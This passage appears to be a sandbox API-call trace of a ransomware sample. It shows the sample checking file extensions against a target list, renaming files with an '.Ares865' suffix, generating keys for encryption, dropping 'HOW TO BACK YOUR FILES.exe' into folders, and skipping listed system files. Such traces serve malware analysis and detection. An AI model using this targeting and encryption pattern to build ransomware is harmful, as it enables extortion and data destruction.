-1 [0060.124] lstrlenW (lpString="maf") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0060.124] lstrlenW (lpString="maq") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0060.124] lstrlenW (lpString="mar") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0060.124] lstrlenW (lpString="marshal") returned 7 [0060.124] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0060.124] lstrlenW (lpString="mas") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0060.124] lstrlenW (lpString="mav") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0060.124] lstrlenW (lpString="maw") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0060.124] lstrlenW (lpString="mdbhtml") returned 7 [0060.124] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0060.124] lstrlenW (lpString="mdn") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0060.124] lstrlenW (lpString="mdt") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0060.124] lstrlenW (lpString="mfd") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0060.124] lstrlenW (lpString="mpd") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0060.124] lstrlenW (lpString="mrg") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0060.124] lstrlenW (lpString="mud") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0060.124] lstrlenW (lpString="mwb") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0060.124] lstrlenW (lpString="myd") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0060.124] lstrlenW (lpString="ndf") returned 3 [0060.124] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0060.124] lstrlenW (lpString="nnt") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0060.125] lstrlenW (lpString="nrmlib") returned 6 [0060.125] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0060.125] lstrlenW (lpString="ns2") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0060.125] lstrlenW (lpString="ns3") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0060.125] lstrlenW (lpString="ns4") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0060.125] lstrlenW (lpString="nsf") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0060.125] lstrlenW (lpString="nv") returned 2 [0060.125] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0060.125] lstrlenW (lpString="nv2") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0060.125] lstrlenW (lpString="nwdb") returned 4 [0060.125] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0060.125] lstrlenW (lpString="nyf") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0060.125] lstrlenW (lpString="odb") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.125] lstrlenW (lpString="odb") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.125] lstrlenW (lpString="oqy") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0060.125] lstrlenW (lpString="ora") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0060.125] lstrlenW (lpString="orx") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0060.125] lstrlenW (lpString="owc") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0060.125] lstrlenW (lpString="p96") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0060.125] lstrlenW (lpString="p97") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0060.125] lstrlenW (lpString="pan") returned 3 [0060.125] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0060.126] lstrlenW (lpString="pdb") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0060.126] lstrlenW (lpString="pdm") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0060.126] lstrlenW (lpString="pnz") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0060.126] lstrlenW (lpString="qry") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0060.126] lstrlenW (lpString="qvd") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0060.126] lstrlenW (lpString="rbf") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0060.126] lstrlenW (lpString="rctd") returned 4 [0060.126] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0060.126] lstrlenW (lpString="rod") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0060.126] lstrlenW (lpString="rodx") returned 4 [0060.126] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0060.126] lstrlenW (lpString="rpd") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0060.126] lstrlenW (lpString="rsd") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0060.126] lstrlenW (lpString="sas7bdat") returned 8 [0060.126] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0060.126] lstrlenW (lpString="sbf") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0060.126] lstrlenW (lpString="scx") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0060.126] lstrlenW (lpString="sdb") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0060.126] lstrlenW (lpString="sdc") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0060.126] lstrlenW (lpString="sdf") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0060.126] lstrlenW (lpString="sis") returned 3 [0060.126] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0060.126] lstrlenW (lpString="spq") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0060.127] lstrlenW (lpString="te") returned 2 [0060.127] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0060.127] lstrlenW (lpString="teacher") returned 7 [0060.127] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0060.127] lstrlenW (lpString="tmd") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0060.127] lstrlenW (lpString="tps") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0060.127] lstrlenW (lpString="trc") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.127] lstrlenW (lpString="trc") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.127] lstrlenW (lpString="trm") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0060.127] lstrlenW (lpString="udb") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0060.127] lstrlenW (lpString="udl") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0060.127] lstrlenW (lpString="usr") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0060.127] lstrlenW (lpString="v12") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0060.127] lstrlenW (lpString="vis") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0060.127] lstrlenW (lpString="vpd") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0060.127] lstrlenW (lpString="vvv") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0060.127] lstrlenW (lpString="wdb") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0060.127] lstrlenW (lpString="wmdb") returned 4 [0060.127] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0060.127] lstrlenW (lpString="wrk") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0060.127] lstrlenW (lpString="xdb") returned 3 [0060.127] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0060.127] lstrlenW (lpString="xld") returned 3 [0060.128] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0060.128] lstrlenW (lpString="xmlff") returned 5 [0060.128] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0060.128] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\My Documents\\My Music\\desktop.ini.Ares865") returned 63 [0060.128] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\My Documents\\My Music\\desktop.ini" (normalized: "c:\\users\\default user\\my documents\\my music\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\My Documents\\My Music\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\my documents\\my music\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0060.128] CreateFileW (lpFileName="C:\\Users\\Default User\\My Documents\\My Music\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\my documents\\my music\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.128] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=504) returned 1 [0060.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0060.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.129] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.130] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.130] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.130] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500, lpName=0x0) returned 0x164 [0060.132] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x500) returned 0x190000 [0060.132] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.133] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.133] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.133] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.133] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.134] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.134] CloseHandle (hObject=0x164) returned 1 [0060.134] CloseHandle (hObject=0x15c) returned 1 [0060.135] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0060.135] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.135] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.135] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f3b220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.135] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.135] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f3b220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.135] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0060.135] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0060.135] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Music", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Music") returned="C:\\Users\\Default User\\Music" [0060.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd068 | out: hHeap=0x2b0000) returned 1 [0060.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0060.136] lstrlenW (lpString="C:\\Users\\Default User\\Music") returned 27 [0060.136] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Music" | out: lpString1="C:\\Users\\Default User\\Music") returned="C:\\Users\\Default User\\Music" [0060.136] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.136] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.136] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.136] GetLastError () returned 0x0 [0060.136] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.136] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.136] CloseHandle (hObject=0x12c) returned 1 [0060.137] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.137] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.137] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5557a680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5557a680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.137] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.137] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.137] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.137] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5557a680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5557a680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.137] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.137] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.137] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.137] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.137] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5557a680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini.Ares865", cAlternateFileName="DESKTO~1.ARE")) returned 1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="aoldtz.exe") returned 1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2=".") returned 1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="..") returned 1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="windows") returned -1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="bootmgr") returned 1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="temp") returned -1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="pagefile.sys") returned -1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="boot") returned 1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ids.txt") returned -1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="ntuser.dat") returned -1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="perflogs") returned -1 [0060.137] lstrcmpiW (lpString1="desktop.ini.Ares865", lpString2="MSBuild") returned -1 [0060.137] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0060.137] lstrlenW (lpString="C:\\Users\\Default User\\Music\\*") returned 29 [0060.137] lstrcpyW (in: lpString1=0x2cce438, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0060.137] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0060.137] lstrlenW (lpString="Ares865") returned 7 [0060.138] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0060.138] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f3b220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.138] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.138] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f3b220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.138] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.138] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0060.138] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings") returned="C:\\Users\\Default User\\Local Settings" [0060.138] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8f8 | out: hHeap=0x2b0000) returned 1 [0060.138] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0060.138] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings") returned 36 [0060.138] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings" | out: lpString1="C:\\Users\\Default User\\Local Settings") returned="C:\\Users\\Default User\\Local Settings" [0060.138] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.138] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.139] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.139] GetLastError () returned 0x0 [0060.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.139] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.139] CloseHandle (hObject=0x12c) returned 1 [0060.139] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.139] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.139] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.139] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.139] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.139] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.139] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.140] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.140] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.140] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.140] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.140] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="aoldtz.exe") returned 1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="bootmgr") returned -1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="temp") returned -1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="pagefile.sys") returned -1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="boot") returned -1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="ids.txt") returned -1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="ntuser.dat") returned -1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="perflogs") returned -1 [0060.140] lstrcmpiW (lpString1="Application Data", lpString2="MSBuild") returned -1 